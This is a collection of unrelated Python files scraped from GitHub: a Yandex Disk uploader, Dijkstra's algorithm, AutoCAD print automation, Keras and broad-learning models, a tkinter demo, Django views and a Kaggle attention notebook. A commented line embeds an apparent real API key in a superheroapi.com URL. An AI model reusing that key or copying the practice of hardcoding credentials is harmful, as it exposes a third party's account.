heroes_name in heroes_list:\n# response = requests.get(f'https://superheroapi.com/api/2619421814940190/search/{heroes_name}')\n# heroes_intelligence = int(response.json()['results'][0]['powerstats']['intelligence'])\n# best_intelligence = 0\n# clever_hero = ''\n# if heroes_intelligence > best_intelligence:\n# best_intelligence = heroes_intelligence\n# clever_hero = heroes_name\n# print(clever_hero, best_intelligence)\n\n# def test_request():\n# url = \"https://cloud-api.yandex.net/v1/disk/resources/files\"\n# TOKEN =\n# headers = {'Authorization': 'OAuth TOKEN, 'Content-Type': 'application/json'}\n# response = requests.get(url, headers=headers)\n# pprint(response.json())\n#\n# if __name__ == '__main__':\n# test_request()\n\n# TASK 2\nimport requests\n\nclass YaUploader:\n def __init__(self, file_path: str):\n self.file_path = file_path\n\n def upload(self):\n PREPARE_UPLOAD_URL = \"https://cloud-api.yandex.net/v1/disk/resources/upload\"\n params = {'path':'test_upload.txt', 'overwrite': 'true'}\n TOKEN = 'OAuth ****************************************'\n headers = {'Accept': 'application/json', 'Authorization': TOKEN}\n\n response = requests.get(PREPARE_UPLOAD_URL, params=params, headers=headers)\n put_url = response.json().get('href')\n\n files = {'file': open(self.file_path, 'rb')}\n response = requests.put(put_url, files=files, headers=headers)\n if response.status_code == 201: print('File successfully uploaded.')\n\nif __name__ == '__main__':\n uploader = YaUploader('test_upload.txt')\n result = 
uploader.upload()\n\n","repo_name":"AntonVetoshkin/requests","sub_path":"requests_test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41235369816","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\ngraph = [INF] * (n + 1)\ndistance = [[] for _ in range(n + 1)]\nfor i in range(m):\n a, b, c = map(int, input().split())\n distance[a].append((b, c))\n distance[b].append((a, c))\n\nq = []\nstart = 1\ngraph[start] = 0\nheapq.heappush(q, (graph[start], start))\n\nwhile q:\n dist, now = heapq.heappop(q)\n\n if dist > graph[now]:\n continue\n for i in distance[now]:\n cost = dist + i[1]\n if graph[i[0]] > cost:\n graph[i[0]] = cost\n heapq.heappush(q, (cost, i[0]))\n\nprint(graph[n])\n","repo_name":"ocxh/std_algorithm","sub_path":"BOJ/5972.py","file_name":"5972.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19365621332","text":"\r\nfrom pyautocad import Autocad\r\nimport win32com.client\r\nimport win32print\r\nimport pythoncom\r\nimport time\r\n\r\n\r\n#acad = Autocad(create_if_not_exists = True)\r\nacad = win32com.client.Dispatch(\"AutoCAD.Application.23\") # this step makes a big difference; AutoCAD.Application.23 is the ProgID\r\n\r\n\r\n\r\nacaddoc = acad.ActiveDocument\r\nacadmod = acaddoc.ModelSpace\r\nlayout = acaddoc.layouts.item('Model')\r\nplot = acaddoc.Plot\r\n\r\n\r\n\r\n_PRINTER = win32print.GetDefaultPrinter()\r\n_HPRINTER = win32print.OpenPrinter(_PRINTER)\r\n#_PrinterStatus = 'Warning'\r\n\r\n\r\n\r\n\r\ndef PrinterStyleSetting(): \r\n acaddoc.SetVariable('BACKGROUNDPLOT', 0) # plot in the foreground\r\n layout.ConfigName = 'RICOH MP C2011' # select the printer\r\n layout.StyleSheet = 'monochrome.ctb' # select the plot style\r\n layout.PlotWithLineweights = False # do not plot lineweights\r\n layout.CanonicalMediaName = 'A3' # paper size, A3 here\r\n layout.PlotRotation = 1 # plot in landscape\r\n layout.CenterPlot = True # center the plot\r\n layout.PlotWithPlotStyles = True # plot according to plot styles\r\n layout.PlotHidden = False # hide paper space objects\r\n print(layout.GetPlotStyleTableNames()[-1])\r\n layout.PlotType = 4 \r\n'''\r\n PlotType (enum type):\r\n acDisplay: plot what is currently displayed. \r\n acExtents: plot everything within the extents of the currently selected space. \r\n acLimits: plot everything within the limits of the current space. \r\n acView: plot the view named by the ViewToPlot property.\r\n acWindow: plot everything inside the window specified by the SetWindowToPlot method.
******\r\n acLayout: plot everything positioned at the edges of the specified paper size, with the origin computed from the 0,0 coordinate. \r\n''' \r\n \r\n \r\n\r\nDEFAULT_START_POSITION =(3,3)\r\n\r\nDRAWING_SIZE = (598,422)\r\nDRAWING_INTEND = 700\r\n\r\n\r\n\r\nclass BackPrint(object):\r\n\r\n _instance = None\r\n def __new__(cls, *args, **kw):\r\n if cls._instance is None:\r\n cls._instance = super(BackPrint, cls).__new__(cls)\r\n return cls._instance\r\n def __init__(self,PositionX,PositionY):\r\n self.x = PositionX\r\n self.y = PositionY\r\n @staticmethod\r\n def APoint(x,y):\r\n \"\"\"Convert a coordinate point to floats\"\"\"\r\n # needs the coordinates of two points\r\n return win32com.client.VARIANT(pythoncom.VT_ARRAY | pythoncom.VT_R8, (x,y))\r\n def run(self,Scale = 1.0):\r\n #self.PrinterStyleSetting()\r\n po1 = self.APoint(self.x * Scale - 1, self.y * Scale)\r\n po2 = self.APoint(self.x * Scale - 1 + DRAWING_SIZE[0], self.y * Scale + DRAWING_SIZE[1]) # lower-left and upper-right points\r\n layout.SetWindowToPlot(po1, po2)\r\n PrinterStyleSetting()\r\n plot.PlotToDevice() \r\n\r\n \r\n\r\nclass PrintTask:\r\n def __init__(self,maxPrintPositionArray,startPosition=(DEFAULT_START_POSITION[0],DEFAULT_START_POSITION[1])):\r\n \r\n self._PrinterStatus = 'Waiting'\r\n self.maxPrintPositionArray = maxPrintPositionArray # data validation is needed here\r\n self.printBasePointArray = []\r\n self.taskPoint = startPosition\r\n self.PrintingTaskNumber = 0\r\n \r\n \r\n \r\n def runtask(self,):\r\n if not self.printBasePointArray:\r\n self.printBasePointArray = self.generalPrintBasePointArray(self.maxPrintPositionArray)\r\n \r\n for position in self.printBasePointArray:\r\n # printBasePointArray format: [(,),(,),]\r\n self.taskPoint = position\r\n current_task = BackPrint(*position)\r\n current_task.run()\r\n \r\n self.PrintingTaskNumber = len(win32print.EnumJobs(_HPRINTER,0,-1,1))\r\n #print('ing-> ',self.PrintingTaskNumber,'position',position)\r\n\r\n while self.PrintingTaskNumber >= 5: \r\n time.sleep(1)\r\n self.PrintingTaskNumber = len(win32print.EnumJobs(_HPRINTER,0,-1,1))\r\n time.sleep(1)\r\n \r\n \r\n def ResumeTask(self,):\r\n pass\r\n def generalPrintBasePointArray(self,maxPrintPositionArray): \r\n printBasePointArray = []\r\n next_drawing_xORy_intend = DRAWING_INTEND\r\n \r\n current_x = int((self.taskPoint[0] - 4)/ DRAWING_INTEND)*DRAWING_INTEND + DEFAULT_START_POSITION[0]\r\n current_y = int((self.taskPoint[1] - 4)/DRAWING_INTEND)*DRAWING_INTEND + DEFAULT_START_POSITION[1]\r\n \r\n \r\n #print(current_x,current_y)\r\n \r\n for position in maxPrintPositionArray:\r\n while current_x <= position + DEFAULT_START_POSITION[0]:\r\n printBasePointArray.append((current_x,current_y))\r\n current_x += next_drawing_xORy_intend\r\n current_x = DEFAULT_START_POSITION[0]\r\n current_y += next_drawing_xORy_intend \r\n return printBasePointArray # printBasePointArray format: [(,),(,),]\r\n \r\n def getTaskNumber(self,):\r\n TaskNumber = self.PrintingTaskNumber\r\n try:\r\n TaskNumber = len(win32print.EnumJobs(_HPRINTER,0,-1,1))\r\n return TaskNumber\r\n except Exception as e:\r\n return TaskNumber\r\n\r\n\r\nif __name__ == '__main__':\r\n #task = PrintTask([25094,10395,]) # steel columns below basement level LG\r\n #task = PrintTask([27895,]) # steel columns at basement level LG\r\n task = PrintTask([27895,],(6194,4)) # steel columns at basement level LG\r\n task.runtask()\r\n\r\n","repo_name":"liangliang115715/cadprint","sub_path":"repository/cadprint.py","file_name":"cadprint.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10343073568","text":"from keras.datasets import mnist\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import
Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import RMSprop, Adam, SGD\nfrom keras.backend import clear_session\nimport random\n\ndataset=mnist.load_data()\ntrain,test=dataset\nX_train,y_train=train\nX_test,y_test=test\n\nX_train=X_train.reshape(-1,28*28)\nX_train=X_train.astype('float32')\ny_train=to_categorical(y_train)\n\nX_test=X_test.reshape(-1,28*28)\nX_test=X_test.astype('float32')\ny_test=to_categorical(y_test)\n\naccuracy=0\n\nwhile accuracy < 80 :\n clear_session()\n counter=random.randint(1,5)\n learning_rate=random.choice([0.01,0.001,0.0001])\n epoch=random.randint(5,15)\n opt=[RMSprop,SGD,Adam]\n model = Sequential()\n for i in range(counter) :\n model.add(Dense(units=random.choice([512,128,256]),activation=\"relu\",input_shape=(784,)))\n \n counter = counter +1\n print(\"counter is \",counter)\n \n model.add(Dense(units=10,activation=\"softmax\")) \n learning_rate = random.choice([0.01,0.001,0.0001]) \n print(\"learning_rate is\", learning_rate)\n opt=random.choice(opt)\n model.compile(optimizer=(opt)(learning_rate),loss=\"categorical_crossentropy\",metrics=[\"accuracy\"])\n model.fit(X_train,y_train,batch_size=32,epochs=epoch,verbose=1)\n model.summary()\n Accuracy = model.evaluate(x=X_test,y=y_test,batch_size=32)\n print(\"Accuracy: \",(Accuracy[1]*100))\n accuracy = Accuracy[1]*100\n print(accuracy)\n ","repo_name":"saurabhagarwal43800/Integrating-ML-and-DevOps","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35263911450","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 28 03:18:22 2018\n\n\n@author: HAN_RUIZHI yb77447@umac.mo OR 501248792@qq.com\n\nThis code is the first version of BLS Python. \nIf you have any questions about the code or find any bugs\n or errors during use, please feel free to contact me.\nIf you have any questions about the original paper, \n please contact the authors of related paper.\n\"\"\"\nimport os\nimport numpy as np\nfrom sklearn import preprocessing\nfrom numpy import random\nimport time\nfrom sklearn import metrics\nfrom pickle import dump, load\n\n\nclass BroadLearningSystem:\n def __init__(self, saved_folder=\"\", model_name = \"bls_regression\", no_features=20, no_windows=5, no_enhanced_neurons=31, reg=2**-30, verbose=False,save_model=False): \n \"\"\" \n Args:\n no_features: number of the features per window. \n no_windows: number of windows in feature layer.\n no_enhanced_neurons: number of enhanced neurons.\n shrinkage: the shrinkage parameter for enhancement nodes\n reg: the regularization parameter for sparse regualarization\n save_model: whether to save a model after training, default is False\n \"\"\" \n self.model_name = model_name\n self.no_features = no_features\n self.no_windows = no_windows\n self.no_enhanced_neurons = no_enhanced_neurons\n self.reg = reg\n self.verbose = verbose \n self.save_model = save_model \n self.MODEL_PATH = f'{saved_folder}/{model_name}.pkl' \n if (not os.path.exists(saved_folder)) and self.save_model:\n os.makedirs(saved_folder)\n\n def tansig(self,x):\n \"\"\" \n activation function. 
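Algebraically identical to tanh(x); maps any real input into (-1, 1).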
\n \"\"\" \n return (2/(1+np.exp(-2*x)))-1\n\n def pinv(self,A,reg):\n return np.mat(reg*np.eye(A.shape[1])+A.T.dot(A)).I.dot(A.T)\n\n\n def shrink(self,a,b):\n z = np.maximum(a - b, 0) - np.maximum( -a - b, 0)\n return z\n\n def sparse_bls(self,A,b):\n lam = 0.001\n itrs = 50\n AA = np.dot(A.T,A) \n m = A.shape[1]\n n = b.shape[1]\n wk = np.zeros([m,n],dtype = 'double')\n ok = np.zeros([m,n],dtype = 'double')\n uk = np.zeros([m,n],dtype = 'double')\n L1 = np.mat(AA + np.eye(m)).I\n L2 = np.dot(np.dot(L1,A.T),b)\n for i in range(itrs):\n tempc = ok - uk\n ck = L2 + np.dot(L1,tempc)\n ok = self.shrink(ck + uk, lam)\n uk += ck - ok\n wk = ok\n return wk\n\n def training(self,train_x,train_y):\n u = 0\n WF = list()\n for i in range(self.no_windows):\n random.seed(i+u)\n WeightFea=2*random.randn(train_x.shape[1]+1,self.no_features)-1\n WF.append(WeightFea)\n # random.seed(100)\n self.WeightEnhan=2*random.randn(self.no_windows*self.no_features+1,self.no_enhanced_neurons)-1\n #time_start = time.time()\n H1 = np.hstack([train_x, 0.1 * np.ones([train_x.shape[0],1])])\n y = np.zeros([train_x.shape[0],self.no_windows*self.no_features])\n self.WFSparse = list()\n self.distOfMaxAndMin = np.zeros(self.no_windows)\n self.meanOfEachWindow = np.zeros(self.no_windows)\n for i in range(self.no_windows):\n WeightFea = WF[i]\n A1 = H1.dot(WeightFea) \n scaler1 = preprocessing.MinMaxScaler(feature_range=(-1, 1)).fit(A1)\n A1 = scaler1.transform(A1)\n WeightFeaSparse = self.sparse_bls(A1,H1).T\n self.WFSparse.append(WeightFeaSparse)\n \n T1 = H1.dot(WeightFeaSparse)\n self.meanOfEachWindow[i] = T1.mean()\n self.distOfMaxAndMin[i] = T1.max() - T1.min()\n T1 = (T1 - self.meanOfEachWindow[i])/self.distOfMaxAndMin[i] \n y[:,self.no_features*i:self.no_features*(i+1)] = T1\n\n H2 = np.hstack([y,0.1 * np.ones([y.shape[0],1])])\n T2 = H2.dot(self.WeightEnhan)\n\n T2 = self.tansig(T2)\n T3 = np.hstack([y,T2])\n self.WeightTop = self.pinv(T3,self.reg).dot(train_y)\n if self.save_model:\n self.save()\n\n def save(self):\n dump([self.WFSparse,self.distOfMaxAndMin,self.meanOfEachWindow,self.WeightTop,self.WeightEnhan], open(self.MODEL_PATH, 'wb'))\n\n def predict(self, test_x): \n no_samples = test_x.shape[0]\n HH1 = np.hstack([test_x, 0.1 * np.ones([no_samples,1])])\n yy1=np.zeros([no_samples,self.no_windows*self.no_features])\n for i in range(self.no_windows):\n WeightFeaSparse = self.WFSparse[i]\n TT1 = HH1.dot(WeightFeaSparse)\n TT1 = (TT1 - self.meanOfEachWindow[i])/self.distOfMaxAndMin[i] \n yy1[:,self.no_features*i:self.no_features*(i+1)] = TT1\n\n HH2 = np.hstack([yy1, 0.1 * np.ones([yy1.shape[0],1])])\n TT2 = self.tansig(HH2.dot(self.WeightEnhan))\n TT3 = np.hstack([yy1,TT2])\n prediction = TT3.dot(self.WeightTop)\n return prediction\n\n def inference(self, input_seq,pred_steps, x_y_lag=1):\n \"\"\" \n Args:\n input_seq: input x\n pred_steps: number of steps need to infer\n x_y_lag: time step gap between input x and output y\n \"\"\" \n assert len(input_seq.shape) == 2, f\"input sequence should be 2 dimensions: (samples, time steps), but {input_seq.shape}\"\n input_steps = input_seq.shape[1]\n assert x_y_lag <= input_steps, \"time step gap between input x and output y should be smaller than the number of steps of input sequence, otherwise, inference process cannot be continue.\"\n sequence = input_seq\n if os.path.exists(self.MODEL_PATH):\n self.WFSparse,self.distOfMaxAndMin,self.meanOfEachWindow,self.WeightTop,self.WeightEnhan = load(open(self.MODEL_PATH, 'rb'))\n for step in range(pred_steps):\n prediction = 
self.predict(sequence[:,-input_steps:])\n sequence = np.append(sequence,prediction[:,-x_y_lag:],axis = 1)\n return np.array(sequence[:,:input_steps+pred_steps])","repo_name":"Yong-Zhuang/HorizonForcing","sub_path":"model/bls.py","file_name":"bls.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11363433607","text":"# Tkinter Start\n\nfrom tkinter import *\nfrom tkinter import colorchooser\n\nwindow = Tk()\n\n# geometry(\"widthxheight\")\nwindow.geometry(\"500x500\")\n\n\n# title(\"title\")\nwindow.title(\"First Software\")\n\n\n# Widget: 2 steps\n# 1. define the widget object from the respective widget class\n# 2. We need to pack the widget into the window\n\n# Label Widget\n# text_lbl = Label(window,text=\"This is my first software!\")\n# text_lbl.pack(pady=10)\n\n\n# Button Function\n# def showValue():\n# # print(\"Hello, world!\")\n# text_lbl.config(text=\"Good, Morning\")\n\n\n# Button Widget\n# btn_obj = Button(window,text=\"Click Me\", command=showValue)\n# btn_obj.pack(pady = 10)\n\n\n# text_lbl = Label(window)\n# text_lbl.pack(pady=10)\n\n\n# Entry Widget\n\n# text_lbl = Label(window,text=\"Enter your name\")\n# text_lbl.pack(pady=10)\n\n\n# entry_name = Entry(window)\n# entry_name.pack(pady=10)\n\n# def greetUser():\n# user_name = entry_name.get()\n# greet_lbl.config(text=f\"Hello, {user_name}!\")\n\n# btn_obj = Button(window,text=\"Greet Me\", command=greetUser)\n# btn_obj.pack(pady = 10)\n\n\n# greet_lbl = Label(window)\n# greet_lbl.pack(pady=10)\n\n\n\n# List Box:\n\n# lb = Listbox(window,width=50, height=20)\n\n# lb.insert(1,\"Python\")\n# lb.insert(2,\"C++\")\n# lb.insert(3,\"Java\")\n\n# lb.pack(pady=10)\n\n# lb.delete(0)\n\n\n# Color Choose\ndef changeBg():\n color = colorchooser.askcolor()\n # window.config(bg=color[1])\n btn_obj.config(bg=color[1],fg=\"white\")\n\n\nbtn_obj = Button(window, text = \"Choose a color\", command=changeBg)\nbtn_obj.pack(pady=10)\n\n\n\nwindow.mainloop()\n\n\n","repo_name":"sneha2127/python-class-projects","sub_path":"class files/class_files/class-10.py","file_name":"class-10.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13298937032","text":"import csv\nfrom os import path\nfrom datetime import datetime\n\n# extract only queries from the query file\ndef queryonly(filename=''):\n if filename == '':\n now = datetime.now().strftime(\"%Y%m%d_%H\")\n filename = './results/queries/query_'+now+'.csv'\n \n # raise an error if not exists\n if not path.exists(filename):\n raise NameError(f\"Cannot read file named '{path.abspath(filename)}'.\")\n \n queryfilename = './results/onlyqueries/RDF_Llama2_gensim_'+filename.split('/query_')[1].split('.csv')[0]+'.txt'\n \n qf = open(queryfilename, mode='a', encoding=\"utf-8\")\n\n # memory = [] \n with open(filename, mode='r', encoding=\"utf-8\") as f:\n csv_file = csv.reader(f, delimiter=\",\")\n for row in csv_file:\n input, query = row\n \n if query == 'query':\n continue\n if input.startswith('['):\n continue\n \n qf.write(query)\n qf.write('\\n\\n')\n \n qf.close()\n \n print(f\"\\nquery saved: {queryfilename}\")\n return queryfilename\n\n\n# queryonly(filename='results/queries/query_YYYYmmdd_hh.csv') # ex) 
results/queries/query_20230825_14.csv","repo_name":"orangingq/LLM_experiment","sub_path":"results/queryonly.py","file_name":"queryonly.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28885795020","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterationForm, UserUpdateForm, ProfileUpdateForm\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterationForm(request.POST)\n if form.is_valid():\n form.save() # comment it and users data will not save to db\n username = form.cleaned_data.get('username')\n messages.success(request, f'Your account has been created! You are now able to login')\n return redirect('login') #name of the URL pattern to linuxls home\n else:\n form = UserRegisterationForm()\n return render(request, 'users/register.html',{'form': form}) # Pass in form as context\n# Create your views here.\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user) # populate forms fields by passing instance of expected objects\n p_form = ProfileUpdateForm(request.POST,request.FILES, instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, f'Your account has been updated!')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance=request.user) # populate forms fields by passing instance of expected objects\n p_form = ProfileUpdateForm()\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n return render(request, 'users/profile.html', context)\n","repo_name":"irtaza06/linuxls_project","sub_path":"www/linuxls_website/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71049658491","text":"# Imports\n# Basic\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\nimport os, random, math\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\n# DL\nimport tensorflow as tf\nimport keras\nimport keras.backend as K\nfrom keras.callbacks import Callback\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras import Model\nfrom keras.layers import Layer, Input, Embedding, Dropout, SpatialDropout1D, GlobalAveragePooling1D\nfrom keras.layers import GlobalMaxPooling1D, Bidirectional, GRU, CuDNNGRU, Activation, Dense\nfrom keras.layers import Dot, Reshape, TimeDistributed, concatenate, BatchNormalization\nfrom keras import initializers, regularizers, constraints\nfrom keras.optimizers import Adam\n\n# Visualization\nimport matplotlib.pyplot as plt\nfrom IPython.core.display import display, HTML\nimport seaborn as sns\nsns.set()\n# Util functions\n# Custom F1 callback\nclass F1Evaluation(Callback):\n def __init__(self, validation_data=(), interval=1):\n super(Callback, self).__init__()\n\n self.interval = interval\n self.X_val, self.y_val = validation_data\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.interval == 0:\n y_pred = self.model.predict(self.X_val, verbose=0)\n y_pred = (y_pred > 0.35).astype(int)\n score = metrics.f1_score(self.y_val, y_pred, average=\"micro\")\n print(\"\\n F1 Score - epoch: %d - score: %.6f \\n\" % (epoch+1, score))\n\ndef make_plot(loss, val_loss, acc, val_acc):\n t = np.arange(1,len(loss)+1,1)\n\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,3))\n plt.subplots_adjust(wspace=0.2)\n\n ax1.plot(t, loss)\n ax1.plot(t, val_loss)\n ax1.set_xlabel('epoch')\n ax1.set_ylabel('loss')\n ax1.set_title('Train vs Val loss')\n ax1.legend(['train','val'], ncol=2, loc='upper right')\n\n ax2.plot(t, acc)\n ax2.plot(t, val_acc)\n ax2.set_xlabel('epoch')\n ax2.set_ylabel('acc')\n ax2.set_title('Train vs Val acc')\n ax2.legend(['train','val'], ncol=2, loc='upper right')\n\n plt.show();\n\ndef rgb_to_hex(rgb):\n return '#%02x%02x%02x' % rgb\n \ndef attention2color(attention_score):\n r = 255 - int(attention_score * 255)\n color = rgb_to_hex((255, r, r))\n return str(color)\n\ndef visualize_attention():\n # Make new model for output predictions and attentions\n model_att = Model(inputs=model.input, \\\n outputs=[model.output, model.get_layer('attention_vec').output])\n idx = np.random.randint(low = 0, high=X_te.shape[0]) # Get a random test\n tokenized_sample = np.trim_zeros(X_te[idx]) # Get the tokenized text\n label_probs, attentions = model_att.predict(X_te[idx:idx+1]) # Perform the prediction\n\n # Get decoded text and labels\n id2word = dict(map(reversed, tokenizer.word_index.items()))\n decoded_text = [id2word[word] for word in tokenized_sample] \n \n # Get classification\n label = np.argmax((label_probs>0.5).astype(int).squeeze()) # Only one\n label2id = ['Sincere', 'Insincere']\n\n # Get word attentions using attenion vector\n token_attention_dic = {}\n max_score = 0.0\n min_score = 0.0\n for token, attention_score in zip(decoded_text, attentions[0][-len(tokenized_sample):]):\n token_attention_dic[token] = attention_score\n \n\n # Build HTML String to viualize attentions\n html_text = \"
<hr><b>Text:</b> \"\n for token, attention in token_attention_dic.items():\n html_text += \"<span style='background-color:{};'>{} </span>\".format(attention2color(attention),\n token)\n #html_text += \"<br><br>\"\n #html_text += \"<br><b>Classified as:</b> \"\n #html_text += label2id[label] \n #html_text += \"
    \"\n \n # Display text enriched with attention scores \n display(HTML(html_text))\n \n # PLOT EMOTION SCORES\n \n _labels = ['sincere', 'insincere']\n plt.figure(figsize=(5,2))\n plt.bar(np.arange(len(_labels)), label_probs.squeeze(), align='center', alpha=0.5, color=['black', 'red', 'green', 'blue', 'cyan', \"purple\"])\n plt.xticks(np.arange(len(_labels)), _labels)\n plt.ylabel('Scores')\n plt.show()\n \ndef under_sample(train_df):\n # UNDER SAMPLE\n insincere = len(train_df[train_df.target == 1])\n insincere_indices = train_df[train_df.target == 1].index\n\n sincere_indices = train_df[train_df.target == 0].index\n random_indices = np.random.choice(sincere_indices, insincere, replace=False)\n\n under_sample_indices = np.concatenate([insincere_indices,random_indices])\n under_sample = train_df.loc[under_sample_indices]\n train_df = under_sample.sample(frac=1)\n train_df.info()\n return train_df\n\ndef get_coefs(word, *arr): return word, np.asarray(arr, dtype='float32')\n\ndef get_embeddings_matrix():\n embeddings_index = dict(get_coefs(*o.rstrip().rsplit(' ')) for o in open(EMBEDDING_FILE))\n\n word_index = tokenizer.word_index\n nb_words = min(MAX_FEATURES, len(word_index))\n print('nb_words: %d' % nb_words)\n embedding_matrix = np.zeros((nb_words, EMB_SIZE))\n print('Embedding matrix shape: %d/%d' % (nb_words, EMB_SIZE))\n for word, i in word_index.items():\n if i >= nb_words: continue\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None: embedding_matrix[i] = embedding_vector\n return embedding_matrix\n\ndef visualize_attention():\n # Make new model for output predictions and attentions\n '''\n model.get_layer('attention_vec').output:\n attention_vec (Attention) [(None, 128), (None, 54)] <- We want (None,54) that is the word att\n '''\n model_att = Model(inputs=model.input, \\\n outputs=[model.output, model.get_layer('attention_vec').output[-1]])\n idx = np.random.randint(low = 0, high=X_te.shape[0]) # Get a random test\n tokenized_sample = np.trim_zeros(X_te[idx]) # Get the tokenized text\n label_probs, attentions = model_att.predict(X_te[idx:idx+1]) # Perform the prediction\n\n # Get decoded text and labels\n id2word = dict(map(reversed, tokenizer.word_index.items()))\n decoded_text = [id2word[word] for word in tokenized_sample] \n \n # Get classification\n label = (label_probs>0.5).astype(int).squeeze() # Only one\n label2id = ['Sincere', 'Insincere']\n\n # Get word attentions using attenion vector\n token_attention_dic = {}\n max_score = 0.0\n min_score = 0.0\n \n attentions_text = attentions[0,-len(tokenized_sample):]\n #plt.bar(np.arange(0,len(attentions.squeeze())), attentions.squeeze())\n #plt.show();\n #print(attentions_text)\n attentions_text = (attentions_text - np.min(attentions_text)) / (np.max(attentions_text) - np.min(attentions_text))\n for token, attention_score in zip(decoded_text, attentions_text):\n #print(token, attention_score)\n token_attention_dic[token] = attention_score\n \n\n # Build HTML String to viualize attentions\n html_text = \"
<hr><b>Text:</b> \"\n for token, attention in token_attention_dic.items():\n html_text += \"<span style='background-color:{};'>{} </span>\".format(attention2color(attention),\n token)\n #html_text += \"<br><br>\"\n #html_text += \"<br><b>Classified as:</b> \"\n #html_text += label2id[label] \n #html_text += \"
    \"\n \n # Display text enriched with attention scores \n display(HTML(html_text))\n \n # PLOT EMOTION SCORES\n _labels = ['sincere', 'insincere']\n probs = np.zeros(2)\n probs[1] = label_probs\n probs[0] = 1- label_probs\n plt.figure(figsize=(5,2))\n plt.bar(np.arange(len(_labels)), probs.squeeze(), align='center', alpha=0.5, color=['black', 'red', 'green', 'blue', 'cyan', \"purple\"])\n plt.xticks(np.arange(len(_labels)), _labels)\n plt.ylabel('Scores')\n plt.show()\n# Util classes\nclass Attention(Layer):\n def __init__(self,\n W_regularizer=None, b_regularizer=None,\n W_constraint=None, b_constraint=None,\n bias=True, return_attention=False,\n **kwargs):\n self.supports_masking = True\n self.return_attention = return_attention\n self.init = initializers.get('glorot_uniform')\n\n self.W_regularizer = regularizers.get(W_regularizer)\n self.b_regularizer = regularizers.get(b_regularizer)\n\n self.W_constraint = constraints.get(W_constraint)\n self.b_constraint = constraints.get(b_constraint)\n\n self.bias = bias\n super(Attention, self).__init__(**kwargs)\n\n\n def build(self, input_shape):\n assert len(input_shape) == 3\n\n self.W = self.add_weight((input_shape[-1],),\n initializer=self.init,\n name='{}_W'.format(self.name),\n regularizer=self.W_regularizer,\n constraint=self.W_constraint)\n if self.bias:\n self.b = self.add_weight((input_shape[1],),\n initializer='zero',\n name='{}_b'.format(self.name),\n regularizer=self.b_regularizer,\n constraint=self.b_constraint)\n else:\n self.b = None\n\n self.built = True\n\n def compute_mask(self, input, input_mask=None):\n # do not pass the mask to the next layers\n return None\n\n def call(self, x, mask=None):\n eij = K.squeeze(K.dot(x, K.expand_dims(self.W)), axis=-1)\n\n if self.bias:\n eij += self.b\n\n eij = K.tanh(eij)\n\n a = K.exp(eij)\n\n # apply mask after the exp. will be re-normalized next\n if mask is not None:\n # Cast the mask to floatX to avoid float64 upcasting in theano\n a *= K.cast(mask, K.floatx())\n\n # in some cases especially in the early stages of training the sum may be almost zero\n # and this results in NaN's. 
A workaround is to add a very small positive number ε to the sum.\n # a /= K.cast(K.sum(a, axis=1, keepdims=True), K.floatx())\n a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\n\n weighted_input = x * K.expand_dims(a)\n\n result = K.sum(weighted_input, axis=1)\n\n if self.return_attention:\n return [result, a]\n return result\n\n def compute_output_shape(self, input_shape):\n if self.return_attention:\n return [(input_shape[0], input_shape[-1]),\n (input_shape[0], input_shape[1])]\n else:\n return input_shape[0], input_shape[-1]\n# Hyperparameters\n\nEMB_SIZE = 300\nMAX_FEATURES = 50000 # how many unique words to use (i.e num rows in embedding vector)\nMAX_LEN = 100 # Maximum length for texts\nEMBEDDING_FILE = '../input/embeddings/glove.840B.300d/glove.840B.300d.txt'\n# Load Train/Test\ntrain_df = pd.read_csv(\"../input/train.csv\")\ntest_df = pd.read_csv(\"../input/test.csv\")\nprint(\"Train shape : \",train_df.shape)\nprint(\"Test shape : \",test_df.shape)\n## split to train and val\ntrain_df, val_df = train_test_split(train_df, test_size=0.05, random_state=2018)\n\n## fill up the missing values\nX_tra = train_df[\"question_text\"].fillna(\"_na_\").values\nX_val = val_df[\"question_text\"].fillna(\"_na_\").values\nX_te = test_df[\"question_text\"].fillna(\"_na_\").values\n\n## Tokenize the sentences\ntokenizer = 